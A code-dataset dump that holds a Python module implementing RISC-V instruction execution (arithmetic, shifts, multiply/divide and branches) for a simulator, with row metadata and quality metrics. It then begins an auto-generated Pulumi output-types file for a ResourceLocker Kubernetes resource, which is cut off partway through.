hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
269f3899e2caa5d9fcfd6adb5d12dfb80d8ece0b
| 16,294
|
py
|
Python
|
riscv/execute/__init__.py
|
jhaskinsjr/ussim
|
cbbd2b5b7bb3a5b4b8db8c1e7da02407c4064895
|
[
"BSD-2-Clause"
] | null | null | null |
riscv/execute/__init__.py
|
jhaskinsjr/ussim
|
cbbd2b5b7bb3a5b4b8db8c1e7da02407c4064895
|
[
"BSD-2-Clause"
] | null | null | null |
riscv/execute/__init__.py
|
jhaskinsjr/ussim
|
cbbd2b5b7bb3a5b4b8db8c1e7da02407c4064895
|
[
"BSD-2-Clause"
] | null | null | null |
import functools
import riscv.constants
def lui(imm):
    # Description
    #   LUI (U-type): load the U-immediate into the destination register.
    #   The value arrives here presumably already shifted into bits [31:12]
    #   by the decoder — TODO confirm against the decode stage.
    # Implementation
    #   x[rd] = sext(immediate[31:12] << 12)
    # see: https://msyksphinz-self.github.io/riscv-isadoc/html/rvi.html#lui
    value = imm
    return riscv.constants.integer_to_list_of_bytes(value, 64, 'little')
def auipc(pc, imm):
    # Description
    #   AUIPC (U-type): form a pc-relative address by adding the (pre-shifted)
    #   U-immediate offset to the current pc.
    # Implementation
    #   x[rd] = pc + sext(immediate[31:12] << 12)
    # see: https://msyksphinz-self.github.io/riscv-isadoc/html/rvi.html#auipc
    base = int.from_bytes(pc, 'little')
    return riscv.constants.integer_to_list_of_bytes(base + imm, 64, 'little')
def jal(pc, imm, sz):
    # JAL: jump to pc + offset; the return address is the address of the
    # instruction following the jump (pc + instruction size).
    base = int.from_bytes(pc, 'little')
    next_pc = riscv.constants.integer_to_list_of_bytes(base + imm, 64, 'little')
    ret_pc = riscv.constants.integer_to_list_of_bytes(base + sz, 64, 'little')
    return (next_pc, ret_pc)
def jalr(pc, imm, rs1, sz):
    # Description
    #   JALR: jump to rs1 + sext(offset); the return address is pc + size.
    # Implementation
    #   t = pc + sz; pc = (x[rs1] + sext(offset)) & ~1
    #   Per the spec the least-significant bit of the computed target is
    #   cleared (& -2 below); the previous code omitted this masking.
    # see: https://msyksphinz-self.github.io/riscv-isadoc/html/rvi.html#jalr
    target = (imm + int.from_bytes(rs1, 'little')) & -2
    return (
        riscv.constants.integer_to_list_of_bytes(target, 64, 'little'),
        riscv.constants.integer_to_list_of_bytes(sz + int.from_bytes(pc, 'little'), 64, 'little'),
    ) # next_pc, ret_pc
def addi(rs1, imm):
    # Description
    #   ADDI: add the sign-extended 12-bit immediate to rs1. Overflow is
    #   ignored; the result is the low XLEN bits. ADDI rd, rs1, 0 implements
    #   the MV pseudo-instruction.
    # Implementation
    #   x[rd] = x[rs1] + sext(immediate)
    # see: https://msyksphinz-self.github.io/riscv-isadoc/html/rvi.html#addi
    augend = int.from_bytes(rs1, 'little', signed=True)
    return riscv.constants.integer_to_list_of_bytes(augend + imm, 64, 'little')
def slti(rs1, imm):
    # Description
    #   SLTI: write 1 to rd if rs1 is less than the sign-extended immediate
    #   under signed comparison, else write 0.
    # Implementation
    #   x[rd] = x[rs1] <s sext(immediate)
    # see: https://msyksphinz-self.github.io/riscv-isadoc/html/rvi.html#slti
    lhs = int.from_bytes(rs1, 'little', signed=True)
    flag = 1 if lhs < imm else 0
    return riscv.constants.integer_to_list_of_bytes(flag, 64, 'little')
def sltiu(rs1, imm):
    # Description
    #   SLTIU: write 1 to rd if rs1 is less than the immediate under unsigned
    #   comparison, else 0. The 12-bit immediate is first sign-extended and
    #   then *treated as unsigned*, so a negative imm must be reduced modulo
    #   2**64 before comparing (the previous code compared against the raw
    #   negative Python int, which made the branch always False).
    # Implementation
    #   x[rd] = x[rs1] <u sext(immediate)
    # see: https://msyksphinz-self.github.io/riscv-isadoc/html/rvi.html#sltiu
    rhs = imm & ((2 ** 64) - 1)  # reinterpret the sign-extended imm as unsigned
    return riscv.constants.integer_to_list_of_bytes((1 if int.from_bytes(rs1, 'little') < rhs else 0), 64, 'little')
def andi(rs1, imm):
    # Description
    #   ANDI: bitwise AND of rs1 with the sign-extended 12-bit immediate,
    #   performed per byte on the little-endian byte lists.
    # Implementation
    #   x[rd] = x[rs1] & sext(immediate)
    # see: https://msyksphinz-self.github.io/riscv-isadoc/html/rvi.html#andi
    mask = riscv.constants.integer_to_list_of_bytes(imm, 64, 'little')
    return [a & b for a, b in zip(rs1, mask)]
def add(rs1, rs2):
    # ADD: signed 64-bit addition of two register byte lists.
    lhs = int.from_bytes(rs1, 'little', signed=True)
    rhs = int.from_bytes(rs2, 'little', signed=True)
    return riscv.constants.integer_to_list_of_bytes(lhs + rhs, 64, 'little')
def sub(rs1, rs2):
    # SUB: signed 64-bit subtraction of two register byte lists.
    minuend = int.from_bytes(rs1, 'little', signed=True)
    subtrahend = int.from_bytes(rs2, 'little', signed=True)
    return riscv.constants.integer_to_list_of_bytes(minuend - subtrahend, 64, 'little')
def xor(rs1, rs2):
    # XOR: bytewise exclusive-or of two little-endian byte lists
    # (XOR distributes over the bytes, so no integer conversion is needed).
    return [a ^ b for a, b in zip(rs1, rs2)]
def do_or(rs1, rs2):
    # OR: bytewise inclusive-or of two little-endian byte lists.
    return [a | b for a, b in zip(rs1, rs2)]
def do_and(rs1, rs2):
    # AND: bytewise and of two little-endian byte lists.
    return [a & b for a, b in zip(rs1, rs2)]
def mul(rs1, rs2):
    # MUL: low 64 bits of the signed 64x64 product.
    product = (
        int.from_bytes(rs1, 'little', signed=True) *
        int.from_bytes(rs2, 'little', signed=True)
    )
    return riscv.constants.integer_to_list_of_bytes(product & ((2 ** 64) - 1), 64, 'little')
def mulh(rs1, rs2):
    # MULH: upper 64 bits of the 128-bit signed x signed product.
    product = (
        int.from_bytes(rs1, 'little', signed=True) *
        int.from_bytes(rs2, 'little', signed=True)
    )
    upper = (product >> 64) & ((2 ** 64) - 1)
    return riscv.constants.integer_to_list_of_bytes(upper, 64, 'little')
def mulhsu(rs1, rs2):
    # MULHSU: upper 64 bits of the 128-bit signed(rs1) x unsigned(rs2) product.
    product = (
        int.from_bytes(rs1, 'little', signed=True) *
        int.from_bytes(rs2, 'little')
    )
    upper = (product >> 64) & ((2 ** 64) - 1)
    return riscv.constants.integer_to_list_of_bytes(upper, 64, 'little')
def mulhu(rs1, rs2):
    # MULHU: upper 64 bits of the 128-bit unsigned x unsigned product.
    product = int.from_bytes(rs1, 'little') * int.from_bytes(rs2, 'little')
    upper = (product >> 64) & ((2 ** 64) - 1)
    return riscv.constants.integer_to_list_of_bytes(upper, 64, 'little')
def div(rs1, rs2):
    # Description
    #   DIV: signed 64-bit division, rounding toward zero per the RISC-V M
    #   extension. Python's // floors toward negative infinity, so the
    #   quotient is computed on magnitudes and the sign reapplied.
    # Implementation
    #   x[rd] = x[rs1] /s x[rs2]
    #   Division by zero yields all bits set (-1) rather than trapping.
    #   Overflow (-2**63 / -1) wraps to -2**63 via the 64-bit mask.
    # see: https://msyksphinz-self.github.io/riscv-isadoc/html/rv64m.html#div
    dividend = int.from_bytes(rs1, 'little', signed=True)
    divisor = int.from_bytes(rs2, 'little', signed=True)
    if divisor == 0:
        quotient = -1
    else:
        quotient = abs(dividend) // abs(divisor)
        if (dividend < 0) != (divisor < 0):
            quotient = -quotient
    return riscv.constants.integer_to_list_of_bytes(
        quotient & ((2 ** 64) - 1),
        64,
        'little',
    )
def divu(rs1, rs2):
    # Description
    #   DIVU: unsigned 64-bit division. Floor and truncation coincide for
    #   non-negative operands, so Python's // is correct here.
    # Implementation
    #   x[rd] = x[rs1] /u x[rs2]
    #   Division by zero yields 2**64 - 1 (all bits set) rather than trapping.
    # see: https://msyksphinz-self.github.io/riscv-isadoc/html/rv64m.html#divu
    dividend = int.from_bytes(rs1, 'little')
    divisor = int.from_bytes(rs2, 'little')
    quotient = ((2 ** 64) - 1) if divisor == 0 else dividend // divisor
    return riscv.constants.integer_to_list_of_bytes(
        quotient & ((2 ** 64) - 1),
        64,
        'little',
    )
def rem(rs1, rs2):
    # Description
    #   REM: signed 64-bit remainder. Per the M extension the remainder takes
    #   the sign of the *dividend*; Python's % takes the sign of the divisor,
    #   so the remainder is computed on magnitudes and the sign reapplied.
    # Implementation
    #   x[rd] = x[rs1] %s x[rs2]
    #   Remainder by zero yields the dividend rather than trapping.
    # see: https://msyksphinz-self.github.io/riscv-isadoc/html/rv64m.html#rem
    dividend = int.from_bytes(rs1, 'little', signed=True)
    divisor = int.from_bytes(rs2, 'little', signed=True)
    if divisor == 0:
        remainder = dividend
    else:
        remainder = abs(dividend) % abs(divisor)
        if dividend < 0:
            remainder = -remainder
    return riscv.constants.integer_to_list_of_bytes(
        remainder & ((2 ** 64) - 1),
        64,
        'little',
    )
def remu(rs1, rs2):
    # Description
    #   REMU: unsigned 64-bit remainder.
    # Implementation
    #   x[rd] = x[rs1] %u x[rs2]
    #   Remainder by zero yields the dividend rather than trapping.
    # see: https://msyksphinz-self.github.io/riscv-isadoc/html/rv64m.html#remu
    dividend = int.from_bytes(rs1, 'little')
    divisor = int.from_bytes(rs2, 'little')
    remainder = dividend if divisor == 0 else dividend % divisor
    return riscv.constants.integer_to_list_of_bytes(
        remainder & ((2 ** 64) - 1),
        64,
        'little',
    )
def slli(rs1, shamt):
    # Description
    #   SLLI: logical left shift of rs1 by the immediate shift amount
    #   (RV64 uses bit 25 of the encoding as shamt[5]).
    # Implementation
    #   x[rd] = x[rs1] << shamt
    # see: https://msyksphinz-self.github.io/riscv-isadoc/html/rvi.html#slli
    shifted = int.from_bytes(rs1, 'little') << shamt
    return riscv.constants.integer_to_list_of_bytes(shifted & ((2 ** 64) - 1), 64, 'little')
def srli(rs1, shamt):
    # Description
    #   SRLI: logical (zero-filling) right shift of rs1 by the immediate
    #   shift amount (RV64 uses bit 25 of the encoding as shamt[5]).
    # Implementation
    #   x[rd] = x[rs1] >>u shamt
    # see: https://msyksphinz-self.github.io/riscv-isadoc/html/rvi.html#srli
    shifted = int.from_bytes(rs1, 'little') >> shamt
    return riscv.constants.integer_to_list_of_bytes(shifted, 64, 'little')
def srai(rs1, shamt):
    # Description
    #   SRAI: arithmetic (sign-preserving) right shift of rs1 by the
    #   immediate shift amount (RV64 uses bit 25 of the encoding as shamt[5]).
    # Implementation
    #   x[rd] = x[rs1] >>s shamt
    # see: https://msyksphinz-self.github.io/riscv-isadoc/html/rvi.html#srai
    # Reading signed first makes Python's >> behave as an arithmetic shift.
    shifted = int.from_bytes(rs1, 'little', signed=True) >> shamt
    return riscv.constants.integer_to_list_of_bytes(shifted, 64, 'little')
def addiw(rs1, imm):
    # Description
    #   ADDIW: add the sign-extended 12-bit immediate to rs1 and produce the
    #   sign-extension of the low 32 bits of the sum. ADDIW rd, rs1, 0 is the
    #   SEXT.W pseudo-instruction.
    # Implementation
    #   x[rd] = sext((x[rs1] + sext(immediate))[31:0])
    # see: https://msyksphinz-self.github.io/riscv-isadoc/html/rv64i.html#addiw
    low32 = (imm + int.from_bytes(rs1, 'little')) & ((2 ** 32) - 1)
    # Round-trip through 4 bytes to reinterpret the low 32 bits as signed.
    value = int.from_bytes(low32.to_bytes(4, 'little'), 'little', signed=True)
    return riscv.constants.integer_to_list_of_bytes(value, 64, 'little')
def slliw(rs1, shamt):
    # Description
    #   SLLIW: logical left shift of the 32-bit value in rs1 by the shift
    #   amount in the low 5 bits of the immediate. Encodings with imm[5] != 0
    #   are reserved.
    # Implementation
    #   x[rd] = sext((x[rs1] << shamt)[31:0])
    #   The previous code returned the zero-extended low 32 bits; per the
    #   spec the 32-bit result must be sign-extended to 64 bits (compare
    #   addiw), which the 4-byte signed round-trip below performs.
    # see: https://msyksphinz-self.github.io/riscv-isadoc/html/rv64i.html#slliw
    low32 = (int.from_bytes(rs1, 'little') << shamt) & ((2 ** 32) - 1)
    return riscv.constants.integer_to_list_of_bytes(
        int.from_bytes(low32.to_bytes(4, 'little'), 'little', signed=True),
        64,
        'little',
    )
def srliw(rs1, shamt):
    # Description
    #   SRLIW: logical right shift of the 32-bit value in rs1 by the shift
    #   amount in the low 5 bits of the immediate. Encodings with imm[5] != 0
    #   are reserved.
    # Implementation
    #   x[rd] = sext(x[rs1][31:0] >>u shamt)
    #   The previous code returned the zero-extended shift result; per the
    #   spec the 32-bit result must be sign-extended to 64 bits (relevant
    #   when shamt == 0 and bit 31 of rs1 is set).
    # see: https://msyksphinz-self.github.io/riscv-isadoc/html/rv64i.html#srliw
    low32 = (int.from_bytes(rs1[:4], 'little') >> shamt) & ((2 ** 32) - 1)
    return riscv.constants.integer_to_list_of_bytes(
        int.from_bytes(low32.to_bytes(4, 'little'), 'little', signed=True),
        64,
        'little',
    )
def sraiw(rs1, shamt):
    # Description
    #   SRAIW: arithmetic right shift of the 32-bit value in rs1 by the shift
    #   amount in the low 5 bits of the immediate. Encodings with imm[5] != 0
    #   are reserved.
    # Implementation
    #   x[rd] = sext(x[rs1][31:0] >>s shamt)
    # see: https://msyksphinz-self.github.io/riscv-isadoc/html/rv64i.html#sraiw
    # Reading the low 4 bytes as signed makes >> an arithmetic shift and the
    # (possibly negative) result already carries the sign extension.
    low32 = int.from_bytes(rs1[:4], 'little', signed=True)
    return riscv.constants.integer_to_list_of_bytes(low32 >> shamt, 64, 'little')
def addw(rs1, rs2):
    # Description
    #   ADDW: add rs1 and rs2, ignore overflow, sign-extend the low 32 bits
    #   of the sum to 64 bits.
    # Implementation
    #   x[rd] = sext((x[rs1] + x[rs2])[31:0])
    # see: https://msyksphinz-self.github.io/riscv-isadoc/html/rv64i.html#addw
    total = (
        int.from_bytes(rs1, 'little', signed=True) +
        int.from_bytes(rs2, 'little', signed=True)
    )
    low_bytes = ((total & ((2 ** 64) - 1)).to_bytes(8, 'little'))[:4]
    value = int.from_bytes(low_bytes, 'little', signed=True)
    return riscv.constants.integer_to_list_of_bytes(value, 64, 'little')
def subw(rs1, rs2):
    # Description
    #   SUBW: subtract rs2 from rs1, ignore overflow, sign-extend the low
    #   32 bits of the difference to 64 bits.
    # Implementation
    #   x[rd] = sext((x[rs1] - x[rs2])[31:0])
    # see: https://msyksphinz-self.github.io/riscv-isadoc/html/rv64i.html#subw
    difference = (
        int.from_bytes(rs1, 'little', signed=True) -
        int.from_bytes(rs2, 'little', signed=True)
    )
    low_bytes = ((difference & ((2 ** 64) - 1)).to_bytes(8, 'little'))[:4]
    value = int.from_bytes(low_bytes, 'little', signed=True)
    return riscv.constants.integer_to_list_of_bytes(value, 64, 'little')
def mulw(rs1, rs2):
    # Implementation
    #   x[rd] = sext((x[rs1] * x[rs2])[31:0])
    #   Multiplication is congruent mod 2**32, so multiplying the full 64-bit
    #   values and keeping the low 32 bits gives the correct MULW result.
    # see: https://msyksphinz-self.github.io/riscv-isadoc/html/rv64m.html#mulw
    product = (
        int.from_bytes(rs1, 'little', signed=True) *
        int.from_bytes(rs2, 'little', signed=True)
    )
    low_bytes = ((product & ((2 ** 64) - 1)).to_bytes(8, 'little'))[:4]
    value = int.from_bytes(low_bytes, 'little', signed=True)
    return riscv.constants.integer_to_list_of_bytes(value, 64, 'little')
def divw(rs1, rs2):
    # Description
    #   DIVW: signed division of the low 32 bits of rs1 by the low 32 bits of
    #   rs2, rounding toward zero, with the 32-bit quotient sign-extended to
    #   64 bits. The previous code divided the full 64-bit values, which
    #   (unlike add/sub/mul) is not congruent mod 2**32, and used Python's
    #   flooring //, which rounds the wrong way for mixed-sign operands.
    # Implementation
    #   x[rd] = sext(x[rs1][31:0] /s x[rs2][31:0])
    #   Division by zero yields -1; overflow (-2**31 / -1) wraps to -2**31.
    # see: https://msyksphinz-self.github.io/riscv-isadoc/html/rv64m.html#divw
    dividend = int.from_bytes(rs1[:4], 'little', signed=True)
    divisor = int.from_bytes(rs2[:4], 'little', signed=True)
    if divisor == 0:
        quotient = -1
    else:
        quotient = abs(dividend) // abs(divisor)
        if (dividend < 0) != (divisor < 0):
            quotient = -quotient
    low32 = quotient & ((2 ** 32) - 1)
    return riscv.constants.integer_to_list_of_bytes(
        int.from_bytes(low32.to_bytes(4, 'little'), 'little', signed=True),
        64,
        'little',
    )
def divuw(rs1, rs2):
    # Description
    #   DIVUW: unsigned division of the low 32 bits of rs1 by the low 32 bits
    #   of rs2, with the 32-bit quotient sign-extended to 64 bits. The
    #   previous code divided the full 64-bit values, which is incorrect for
    #   division (unlike add/sub/mul it is not congruent mod 2**32).
    # Implementation
    #   x[rd] = sext(x[rs1][31:0] /u x[rs2][31:0])
    #   Division by zero yields all 32 bits set (sign-extended to -1).
    # see: https://msyksphinz-self.github.io/riscv-isadoc/html/rv64m.html#divuw
    dividend = int.from_bytes(rs1[:4], 'little')
    divisor = int.from_bytes(rs2[:4], 'little')
    quotient = ((2 ** 32) - 1) if divisor == 0 else dividend // divisor
    low32 = quotient & ((2 ** 32) - 1)
    return riscv.constants.integer_to_list_of_bytes(
        int.from_bytes(low32.to_bytes(4, 'little'), 'little', signed=True),
        64,
        'little',
    )
def remw(rs1, rs2):
    # Description
    #   REMW: signed remainder of the low 32 bits of rs1 by the low 32 bits
    #   of rs2, sign of the dividend, result sign-extended to 64 bits. The
    #   previous code operated on the full 64-bit values (remainder is not
    #   congruent mod 2**32) and used Python's %, which takes the divisor's
    #   sign instead of the dividend's.
    # Implementation
    #   x[rd] = sext(x[rs1][31:0] %s x[rs2][31:0])
    #   Remainder by zero yields the (32-bit) dividend.
    # see: https://msyksphinz-self.github.io/riscv-isadoc/html/rv64m.html#remw
    dividend = int.from_bytes(rs1[:4], 'little', signed=True)
    divisor = int.from_bytes(rs2[:4], 'little', signed=True)
    if divisor == 0:
        remainder = dividend
    else:
        remainder = abs(dividend) % abs(divisor)
        if dividend < 0:
            remainder = -remainder
    low32 = remainder & ((2 ** 32) - 1)
    return riscv.constants.integer_to_list_of_bytes(
        int.from_bytes(low32.to_bytes(4, 'little'), 'little', signed=True),
        64,
        'little',
    )
def remuw(rs1, rs2):
    # Description
    #   REMUW: unsigned remainder of the low 32 bits of rs1 by the low 32
    #   bits of rs2, result sign-extended to 64 bits. The previous code
    #   operated on the full 64-bit values, which is incorrect for the
    #   remainder (not congruent mod 2**32).
    # Implementation
    #   x[rd] = sext(x[rs1][31:0] %u x[rs2][31:0])
    #   Remainder by zero yields the (32-bit) dividend.
    # see: https://msyksphinz-self.github.io/riscv-isadoc/html/rv64m.html#remuw
    dividend = int.from_bytes(rs1[:4], 'little')
    divisor = int.from_bytes(rs2[:4], 'little')
    remainder = dividend if divisor == 0 else dividend % divisor
    low32 = remainder & ((2 ** 32) - 1)
    return riscv.constants.integer_to_list_of_bytes(
        int.from_bytes(low32.to_bytes(4, 'little'), 'little', signed=True),
        64,
        'little',
    )
def beq(pc, rs1, rs2, imm, sz):
    # BEQ: branch to pc + offset when the register byte lists are equal;
    # otherwise fall through to pc + sz. Returns (next_pc, taken).
    base = int.from_bytes(pc, 'little')
    if all(x == y for x, y in zip(rs1, rs2)):
        return (riscv.constants.integer_to_list_of_bytes(base + imm, 64, 'little'), True)
    return (riscv.constants.integer_to_list_of_bytes(base + sz, 64, 'little'), False)
def bne(pc, rs1, rs2, imm, sz):
    # BNE: branch to pc + offset when the register byte lists differ;
    # otherwise fall through to pc + sz. Returns (next_pc, taken).
    base = int.from_bytes(pc, 'little')
    if any(x != y for x, y in zip(rs1, rs2)):
        return (riscv.constants.integer_to_list_of_bytes(base + imm, 64, 'little'), True)
    return (riscv.constants.integer_to_list_of_bytes(base + sz, 64, 'little'), False)
def blt(pc, rs1, rs2, imm, sz):
    # BLT: branch to pc + offset when rs1 < rs2 under signed comparison;
    # otherwise fall through to pc + sz. Returns (next_pc, taken).
    base = int.from_bytes(pc, 'little')
    lhs = int.from_bytes(rs1, 'little', signed=True)
    rhs = int.from_bytes(rs2, 'little', signed=True)
    if lhs < rhs:
        return (riscv.constants.integer_to_list_of_bytes(base + imm, 64, 'little'), True)
    return (riscv.constants.integer_to_list_of_bytes(base + sz, 64, 'little'), False)
def bge(pc, rs1, rs2, imm, sz):
    # BGE: branch to pc + offset when rs1 >= rs2 under signed comparison;
    # otherwise fall through to pc + sz. Returns (next_pc, taken).
    base = int.from_bytes(pc, 'little')
    lhs = int.from_bytes(rs1, 'little', signed=True)
    rhs = int.from_bytes(rs2, 'little', signed=True)
    if lhs >= rhs:
        return (riscv.constants.integer_to_list_of_bytes(base + imm, 64, 'little'), True)
    return (riscv.constants.integer_to_list_of_bytes(base + sz, 64, 'little'), False)
def bltu(pc, rs1, rs2, imm, sz):
    # Description
    #   BLTU: branch to pc + offset when rs1 < rs2 under *unsigned*
    #   comparison; otherwise fall through to pc + sz.
    #   NOTE(review): the riscv-isadoc page linked below writes the
    #   implementation as "if (rs1 >u rs2)", which contradicts the
    #   instruction's own description; this follows the description:
    # Implementation
    #   if (rs1 <u rs2) pc += sext(offset)
    # see: https://msyksphinz-self.github.io/riscv-isadoc/html/rvi.html#bltu
    base = int.from_bytes(pc, 'little')
    lhs = int.from_bytes(rs1, 'little')
    rhs = int.from_bytes(rs2, 'little')
    if lhs < rhs:
        return (riscv.constants.integer_to_list_of_bytes(base + imm, 64, 'little'), True)
    return (riscv.constants.integer_to_list_of_bytes(base + sz, 64, 'little'), False)
def bgeu(pc, rs1, rs2, imm, sz):
    # Description
    #   BGEU: branch to pc + offset when rs1 >= rs2 under unsigned
    #   comparison; otherwise fall through to pc + sz.
    # Implementation
    #   if (rs1 >=u rs2) pc += sext(offset)
    # see: https://msyksphinz-self.github.io/riscv-isadoc/html/rvi.html#bgeu
    base = int.from_bytes(pc, 'little')
    lhs = int.from_bytes(rs1, 'little')
    rhs = int.from_bytes(rs2, 'little')
    if lhs >= rhs:
        return (riscv.constants.integer_to_list_of_bytes(base + imm, 64, 'little'), True)
    return (riscv.constants.integer_to_list_of_bytes(base + sz, 64, 'little'), False)
| 43.450667
| 182
| 0.636737
| 2,430
| 16,294
| 4.15679
| 0.088066
| 0.053361
| 0.091476
| 0.104742
| 0.877042
| 0.869518
| 0.841699
| 0.830413
| 0.81982
| 0.79507
| 0
| 0.040917
| 0.215539
| 16,294
| 375
| 183
| 43.450667
| 0.749257
| 0.384927
| 0
| 0.495652
| 0
| 0
| 0.079765
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.178261
| false
| 0
| 0.008696
| 0.178261
| 0.365217
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 7
|
26cc35bb995813072d7eed65391dae37af7d66d8
| 37,283
|
py
|
Python
|
operators/resource-locker-operator/python/pulumi_pulumi_kubernetes_crds_operators_resource_locker_operator/redhatcop/v1alpha1/outputs.py
|
pulumi/pulumi-kubernetes-crds
|
372c4c0182f6b899af82d6edaad521aa14f22150
|
[
"Apache-2.0"
] | null | null | null |
operators/resource-locker-operator/python/pulumi_pulumi_kubernetes_crds_operators_resource_locker_operator/redhatcop/v1alpha1/outputs.py
|
pulumi/pulumi-kubernetes-crds
|
372c4c0182f6b899af82d6edaad521aa14f22150
|
[
"Apache-2.0"
] | 2
|
2020-09-18T17:12:23.000Z
|
2020-12-30T19:40:56.000Z
|
operators/resource-locker-operator/python/pulumi_pulumi_kubernetes_crds_operators_resource_locker_operator/redhatcop/v1alpha1/outputs.py
|
pulumi/pulumi-kubernetes-crds
|
372c4c0182f6b899af82d6edaad521aa14f22150
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by crd2pulumi. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
from . import outputs
# Public API of this generated module: the Pulumi output types for the
# ResourceLocker CRD (redhatcop/v1alpha1).
__all__ = [
    'ResourceLockerSpec',
    'ResourceLockerSpecPatches',
    'ResourceLockerSpecPatchesSourceObjectRefs',
    'ResourceLockerSpecPatchesTargetObjectRef',
    'ResourceLockerSpecResources',
    'ResourceLockerSpecServiceAccountRef',
    'ResourceLockerStatus',
    'ResourceLockerStatusConditions',
    'ResourceLockerStatusLockedPatchStatuses',
    'ResourceLockerStatusLockedResourceStatuses',
]
@pulumi.output_type
class ResourceLockerSpec(dict):
    """
    ResourceLockerSpec defines the desired state of ResourceLocker
    """
    def __init__(__self__, *,
                 patches: Optional[Sequence['outputs.ResourceLockerSpecPatches']] = None,
                 resources: Optional[Sequence['outputs.ResourceLockerSpecResources']] = None,
                 service_account_ref: Optional['outputs.ResourceLockerSpecServiceAccountRef'] = None):
        """
